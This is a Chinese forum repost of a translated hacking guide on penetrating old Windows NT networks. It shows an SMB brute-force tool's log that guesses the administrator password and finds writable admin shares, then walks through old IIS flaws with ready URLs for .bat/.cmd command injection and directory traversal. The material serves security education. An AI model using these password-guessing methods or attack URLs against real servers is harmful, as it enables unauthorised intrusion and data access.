发信人: rawrence()
整理人: jiaxu2000(2004-03-30 09:53:44), 站内信件
|
下面是通过internet进行真正NAT攻击的实际结果文件。尽管Rhino9小组在进行这
一
攻击时获得准许,但为了保护测试目标还是更改了IP地址。
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: 0.0.0.0
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Tue Oct 14 11:33:46 1997
[*]--- Timezone is UTC-4.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`ADMINIS
TRATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`PASSWOR
D'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Obtained server information:
Server=[AENEMA] User=[] Workgroup=[STATICA] Domain=[]
[*]--- Obtained listing of shares:
共享名类型注释
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
D$ Disk: Default share
E$ Disk: Default share
HPLaser4 Printer: HP LaserJet 4Si
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
print$ Disk: Printer Drivers
[*]--- This machine has a browse list:
服务器注释
AENEMA
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- WARNING: Able to access share: \\*SMBSERVER\D$
[*]--- Checking write access in: \\*SMBSERVER\D$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\D$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\D$
[*]--- Attempting to access share: \\*SMBSERVER\E$
[*]--- WARNING: Able to access share: \\*SMBSERVER\E$
[*]--- Checking write access in: \\*SMBSERVER\E$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\E$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\E$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\print$
[*]--- WARNING: Able to access share: \\*SMBSERVER\print$
[*]--- Checking write access in: \\*SMBSERVER\print$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\print$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\print$
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
如果您仔细地查看这些结果,就能找到向攻击者通知该工具已经发现有效用户名
/口
令的CONNECTED消息。这时,入侵者只需通过新发现的用户名/口令重新连接到那
台机器,
继而进行攻击。
对通过NetBIOS进行远程渗透的探讨到此为止。请记住,上面所讨论的各种方法既
不
是静态的,也不是独立的。那些花费大量时间对如何渗透基于NT的网络进行研究
的入侵者
很富有创造力,他们不仅利用上述各种方法,而且在使用过程中把这些方法个性
化。
通过Web服务器进行的信息收集与渗透
======================================================================
========
目前,通过Web服务器进行的信息收集与远程渗透因internet上的人口爆炸以及因
此
而导致的信息分布已经是众所周知。在讨论NT Web服务器上的远程渗透和信息收
集时,我
们将把重点放在与NT 4.0捆绑在一起的Web服务器——Internet信息服务器上。
尽管有一些要探讨的问题确实过时了,但我们在这里之所以涉及到这些内容,是
因为
Rhino9小组在专业检查中发现有些公司在他们的生产环境中仍然运行比较旧的软
件版本。
我们从信息收集方法开始谈起。我们将讨论在攻击过程中收集信息的各种方法以
及通
过Web服务器获得能在其它类型的攻击中利用的信息。
首先,我们将探讨如何检索目标机上的Web服务器软件包和版本。一些对安全性知
识
一无所知的人可能会感到惊讶,为什么会有人想了解目标机的Web服务器版本?软
件的不
同版本都具有不同的脆弱性。因此,入侵者希望了解这些Web服务器软件和版本。
用来获取Web服务器软件和版本的最老练的方法是telnet到HTTP端口上的目标主机
。
一旦建立了telnet连接,只需发出一个简单的GET命令就能查看到HTTP标题信息,
这些信
息包括正被使用的Web服务器软件和版本。
不喜欢使用远程登录或不希望通过标题信息解析的人会尝试着使用好几种方法。
第一
个也可能是非成功入侵者中最常用的工具是Netcraft。入侵者可以访问www.netc
raft.com
并通过他们的查询引擎从远程目标检索Web服务器信息。Netcraft还可以用来检索
所有已
知的Web服务器主机名。例如,如果我们想找到属于someserver.com域的所有Web
服务器,
就可以用Netcraft的引擎来查询*.someserver.com,接着它会返回一个该域中所
有Web服
务器主机的列表。其它能用来检索Web服务器版本的工具包括1nf0ze(Suld)和G
rinder
(Rhino9的horizon)(所有这些工具的URLs见本文结尾处)。
一旦入侵者确定他所接近的是什么样的Web服务器包,即可拟订攻击计划。
注:这一节仅仅对一些较常见的攻击进行介绍。
要涉及到的第一个攻击是.bat/.cmd缺陷。由于这个缺陷已被公开证实,因此我们
引
用如下(作者未知。如果其作者有机会阅读本文,请马上通知我们,以便于及时
向作者支
付稿酬)。
.bat和.cmd BUG是Netscape服务器中一个众所周知的bug,其描述见WWW安全性常
见问
题解答第59个问题。我们对如何在Internet信息服务器中实现这个bug已经介绍过
多次。
现在我们来看一看IIS Web服务器的初次安装,其中所有的设定都是默认的:
1) CGI目录是/scripts
2) 在/scripts目录下没有abracadabra.bat或abracadabra.cmd文件。
3) IIS Web服务器把.bat和.cmd扩展名映射到cmd.exe。
因此,注册表关键字
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC
\Parameters\ScriptMap有以下字符串:
a) /scripts/abracadabra.bat?&dir+c:\+?&time
b) /scripts/abracadabra.cmd?&dir+c:\+?&time
同时会发生下列情况:
1) 浏览器询问您想怎样保存一个文档。Notepad.exe或其它阅读器适用于这一“
类
型”的应用。
2) 浏览器开始下载对话。屏幕上出现下载窗口。
3) 黑客点击下载窗口上的“取消”按钮,因为服务器上的"time"命令永远不会
终
止。
4) IIS Web服务器不会在服务器端记录任何信息,因为执行进程没有成功地终止
!
!!(幸亏采用了"time"命令。)想了解究竟发生了什么事情的唯一方法是检查
所有的NT
安全记录。但是,这些记录不包含象REMOTE_IP这样的信息。因此,黑客的机器是
完全匿
名的。
我们再重新开始:
1) IIS Web服务器允许黑客通过输入
/scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN来执行他
的
“批处理文件”。在Netscape服务器中,只能执行单一命令。
2) 在/scripts目录下没有abracadabra.bat文件,但.bat扩展名被映射到
C:\WINNT35\System32\cmd.exe。在Netscape服务器中,实际的.bat文件必须存在
。
3) 在黑客输入象"time"或"date"这样的命令作为COMMAND[N]时,IIS Web服务器
不
会记录任何信息。在Netscape服务器上,错误记录会有一个关于远程IP和您试着
执行的命
令的记录。
如果您不能正确地掌握这种情况下所发生的一切,入侵者就会采用以上攻击顺序
在服
务器端生成文件并予以执行。根据攻击者的技术水平和意图,其行为会产生不同
的效果。
幸运的是,大多数工作环境已经不再运行旧得足以受这些缺陷影响的Internet信
息服务器
版本。
在对bat/cmd缺陷进行彻底调查和证明之后不久,另一个bug又震惊了业界。同样
幸运
的是,这个缺陷也仅仅对旧版本的IIS造成影响。这个被称为”double dot bug”
的缺陷
使Web站点的访问者能够从允许访问的web根目录下逃脱并浏览或下载文件。很显
然,最终
服务器会包含不在指定Web根目录下的敏感信息,而这个简单的缺陷会为外来者访
问这些
敏感信息提供机会。这个命令是作为URL执行的,其结构如下:
http://www.someserver.com/..\..
当double dot bug不够用时,不久之后就出现了这个缺陷的另一个变体。这个新
发现
的缺陷使入侵者能够执行目标机上的脚本文件。由于这个新缺陷是double dot b
ug的一个
变体,因此,这些脚本文件都不在web根目录下。这种攻击也是作为URL执行的,
其结构如
下:
http://www.someserver.com/scripts..\..\scriptname
Internet信息服务器的WindowsNT安装需要一些用于公共访问身份认证的帐户。如
果
这些帐户没有以任何方式出现,那么,每一个访问站点的访问者都要提供身份信
息。这并
不是一个提供公用Web站点的非常有效的方法。在Internet信息服务器上,要使用
的帐户
是IUSR_account。这个帐户及其口令都是在安装过程中生成的。根据默认值,该
帐户是
Everyone群组的一个成员,而且,Everyone群组对NT驱动器上的所有信息具有只
读访问权
限。这些方法与上述的缺陷相结合就会造成巨大的安全性破坏。
--
阿鲁的阿,阿鲁的鲁!
※ 修改:.rawrence 于 Dec 12 17:15:29 修改本文.[FROM: 202.101.167.204]
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.101.167.204]
|
|